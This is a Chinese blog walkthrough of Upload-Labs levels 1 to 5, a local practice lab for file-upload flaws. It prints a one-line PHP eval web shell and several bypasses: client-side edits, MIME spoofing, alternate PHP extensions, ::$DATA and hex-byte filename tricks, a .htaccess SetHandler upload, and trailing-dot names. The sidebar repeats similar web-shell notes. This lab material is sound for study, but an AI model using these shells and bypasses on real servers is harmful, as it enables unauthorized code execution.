UploadLabs Less1-5

最新推荐文章于 2023-07-26 19:06:13 发布
最新推荐文章于 2023-07-26 19:06:13 发布
阅读量190 收藏
点赞数 1
分类专栏: Upload Labs 文章标签: php 前端 服务器 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45785324/article/details/126008989
版权

我用的小皮面板pro版本搭建的环境,出现了n多问题,见谅

 php版本5.3.29nts

shell.php         <?php @eval($_POST['x']);?>

黑名单绕过

Less-1(前端验证)

方法一:使用超级火狐进行修改前端页面

 修改这条语句为,点击提交

 复制图像地址打开输入post型x=phpinfo();,成功

 

 

 方法二:bp抓包改filename

修改php后缀为png,上传时bp抓包

 修改为shell2.php,放包,成功

Less--2(MIME验证)

采用文件类型修改

shell.php的上传类型修改为png上传的文件类型image/png

放包成功

Less-3

方法一:php环境版本问题失败

原理:利用对方服务器解析修改后缀为php3、php5、phptml

条件:把httpd.conf里的     AddType application/x-httpd-php .php .phtml .php3 .php5

#去掉

 

 

方法二:16进制过滤

1.trim和deldot函数可以删掉连续的多个空格和点,但str_ireplace函数只能替换掉一个::$DATA,因此本关可以文件末尾双写::$DATA绕过过滤

2.trim函数仅仅是去掉空格,不能去掉空白字符。因此本关可以通过在sh.php文件名末尾加十六进制81~99(比如下图中加的是0x88)来绕过后缀黑名单限制。

此方法借鉴于CSDN博主「仙女象」的博客,十分感谢

原文链接:https://blog.csdn.net/elephantxiang/article/details/120660685

Less-4

phpstudy 环境问题失败

 .htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置.通过htaccess文件,可以实现:网页301重定向、自定义404页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能

php环境问题失败

修改apache的httpd.conf配置AllowOverride None,把None改为All,重启phpstudy的apache,再上传.htaccess文件

SetHandler application/x-httpd-php

 然后上传一句话木马以jpg格式,在一句话木马前添加GIF89a图片头文件

 可用方法:可以用第3关16进制绕过

Less-5

抓包,在filename后改为shell.php. .

 

 

xiao飞仔
关注
专栏目录
less-plugin-clean-css:使用clean-css对CSS进行后期处理和压缩
02-23
npm install -g less-plugin-clean-css 然后在命令行上 lessc file.less --clean-css="--s1 --advanced --compatibility=ie8" 见的可用命令选项-唯一的区别是advanced和rebase ,我们默认为false,因为它并不总是...
关于sqlilab搭建的坎坷历程(使用的是phpstudy
m0_47149127的博客
10-04 1214
关于sqlilab搭建的坎坷历程(使用的是phpstudy) 作为ctf新手,自学了注入,但没有地方练手,就想着搭建靶机,是很经典的sqlilab,可以在官网下载,关于搭建的文章有很多,可以自行搜索。以下主要是搭建过程中的一些报错。 1.与本机上的mysql冲突 解决办法:由于不想破坏本机的mysql,所以我选择了在虚拟机里搭建 2.php版本问题 解决办法:更改了php版本(改为更低的版本) 如果没有5.2.17nts版本可以下载 乱七八糟的题外话: 1.如果U盘拷贝较大文件失败,但是U盘容量是够的
upload-labs通关笔记(上)
qq_51637038的博客
03-15 163
htaccess文件是apache独有的配置文件(.htaccess文件没有名字,只有后缀名),可以实现网页重定向、404错误页面自定义、允许/阻止特定的用户或者目录的访问、改变扩展名等功能,如果能够将.htaccess文件上传至服务器,.htaccess文件可以指定目录下某类文件被当做另一类文件解析。可知本题检查了$_FILES['file']['type']即文件的MIME类型,当文件上传请求发送时网页会将MIME类型写入http头中的content-type项,因此用bp抓包后修改即可。
upload-labs靶场搭建+题目解答
NSQ0207的博客
07-26 441
在使用NTFS格式的时候如果文件名+"::$DATA"会把::$DATA之后的数据当成文件流处理,不会检测后缀名,且保持::$DATA之前的文件名。例如:"phpinfo.php::$DATA"Windows会自动去掉末尾的::$DATA变成"phpinfo.php"发送到Repeater,在Hex处寻找61, 将刚刚a处的61,改为00,回车。修改后缀为.php1 .php2 .php3 .php4 .phtml。在该处输入123.phpa.jpg,注意该处输入为a,方便寻找。
phpStudy集成环境下 安装composer失败
热门推荐
cs958903980的博客
07-25 1万+
报错提示:The "https://getcomposer.org/versions" file could not be downloaded: failed to open stream: 由于连接方在一段时间后没有正确答复或连接的主机没有反应,连接尝试失败。 The "https://getcomposer.org/download/1.2.0/composer.phar.sig" file...
PhpStudy集成环境下载、安装以及配置启动检测
aaLiweipeng的博客
01-15 1278
所谓PHP集成开发环境,可用缩写——AMP描述之: A:Apache M:MySQL P:PHP 我们可以到 phpstudy官网 下载集成环境: 题外话:个人觉得这是一个挺好的网站,资料挺多,囊括视频和电子文档,值得我们接触一下。 安装完了之后我们启动它,看到下边两个绿点代表启动成功: 点击其他选项菜单,菜单中选择My Ho...
弹性布局-less--综合案例
11-02
在这个"弹性布局-LESS-综合案例"中,你可能会遇到以下步骤: 1. 创建LESS文件结构,定义变量和混合,以统一样式。 2. 使用弹性布局设置容器属性,调整项目布局。 3. 使用LESS的嵌套规则编写更整洁的CSS。 4. 应用...
less-plugin-autoprefix:添加了由 autoprefixer 对 less 进行后处理的能力
05-29
npm install -g less-plugin-autoprefix 然后在命令行上, lessc file.less --autoprefix="browsers" 浏览器是由逗号分隔的列表。 程序化用法 var LessPluginAutoPrefix = require ( 'less-plugin-autoprefix' )...
less-plugin-lists:更少的ListArray操作
05-13
少插件列表 用于列表/数组操作的插件。...npm install -g less-plugin-lists 与lessc使用 lessc --lists file.less 有关通过命令行Less编译器使用插件的更多详细信息,请参见Less文档中的相应部分。
less-loader:编译不到CSS
04-29
首先,您需要安装less less-loader : $ npm install less less-loader --save-dev 然后将加载程序添加到您的webpack配置中。 例如: webpack.config.js module . exports = { module : { rules : [ { test ...
安装composer失败
陈万洲的专栏
07-30 1万+
报错提示: [cpp] view plain copy  print? The "https://getcomposer.org/versions" file could not be downloaded: failed to open stream: 由于连接方在一段时间后没有正确答复或连接的主机没有反应,连接尝试失败。   The 
phpstudy8.0安装以及出现的错误
weixin_44944193的博客
04-13 1万+
安装,可以去php中文网去下载一个https://www.php.cn/xiazai/gongju 当然不只是一个8.0的还有2016,2018的,建议下载8.0或者稳定版2016的。讲解8.0安装 软件安装不再说,下一步下一步,注意不要将软件放在c盘(如果你怕软件安装多,电脑死机,可直接安装c盘); 安装后打开软件; 界面: 首先启动,图片中圈着的那俩;(我已经启动过) ...
upload-labs less4-9
eggplant_lala的博客
02-23 155
upload-labs less4-9思路
upload-labs 思路总结 less 1-12
yukinorong的博客
08-16 1071
upload-labs笔记 less 1 上传漏洞的方法有很多。 本地配置好upload-labs之后,利用burpsuite无法抓包问题: 原理有可能是本地代理设置成了默认不抓包127.0.0.1。也有可能是无法抓本地回环数据包。具体原因不清楚,解决方式是将127.0.0.1改为自己的ip地址,ip地址可以用cmd ipconfig中查询。 方法一 本题用的是js函数,白名单模式过滤文件,所有在...
upload-labs 速通 less01-less21
LztCode
11-06 256
非正常速通 >_< 懒 使用的标准一句话,<?php @eval($_REQUEST[666])?> 使用的标准图片马,copy 1.php/b + 1.png/b 1.jpg 使用标准的中国蚁剑,http://127.0.0.1/upload-labs/include.php?file=upload/1.jpg 使用的标准连接密码,666 使用的标准编码设置,utf-8 使用的标准连接类型,php 使用的标准编码器,default less-01. 图片马 less-02. 图片马
文件上传之Upload-Labs过关
内心不种满鲜花就会长满杂草
03-07 4744
目录 less-1 - js限制 方法1 方法2 less-2 - MIME类型检测 方法1 方法2 欢迎来到文件上传之Upload-Labs闯关,接下来介绍每一关的上传绕过方式 less-1 - js限制 方法1 1. 直接上传一个1.php的文件,内容为一句话木马 <?php phpinfo(); ?> 我们上传的时候开启了bp抓包,点击上传的时候,弹出对话框,可是流量并没有经过代理软件bp,由此我们猜想为前端上传的限制,我们查看源码发现,里面有
File Upload(文件上传)(upload-labs 1-5)
hclimg的博客
07-30 975
文件上传介绍 在现代的互联网WEB应用程序中,上传文件是一种常见的功能,它有助于提高业务效率,比如企业的OA系统,允许用户上传头像、照片等许多类型的文件。然而,开放的功能越多,WEB应用受到攻击的风险越大。如果WEB应用存在文件上传漏洞,那么攻击者就可以利用这个漏洞将可执行脚本程序上传到服务器中,获得网站的权限从而进一步危害服务器 文件上传原理 文件上传漏洞通常是未对客户端上传文件的类型、...
upload-labs 11(00截断)
LuckySec
11-07 2271
题目 查看源码 从代码中可以发现红线处,对上传的文件名进行重新拼接 可以通过%00进行截断上传 小提示:%00截断的条件 (1)php版本必须小于5.3.4 (2)打开php的配置文件php-ini,将magic_quotes_gpc设置为Off 验证 文件成功上传! ...
upload-labs-Less1学习
qq_59416598的博客
03-24 3095
Less1 这一关的源码是判断文件类型是否为jpg、png、gif(且为前端验证) 这里有两种方法 直接禁用js脚本(可能影响一些正常的功能),或者先上传允许上传的文件类型然后使用burp suite抓数据包修改文件类型即可 注意,在前端的验证,如果没有绕过的话,是不会发数据包的 所以我们直接上传一个jpg文件,然后抓包改文件类型为php即可上传成功 ...
sqli-labs less-1
最新发布
08-07
"Less-1"的目标可能是让你了解如何构造精心设计的SQL语句,它们既能利用系统提供的漏洞,又能避开简单的过滤规则,获取数据库中的信息。它旨在提升防御者对SQL注入攻击的认识,并教授基本的渗透测试技巧。 要完成这...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值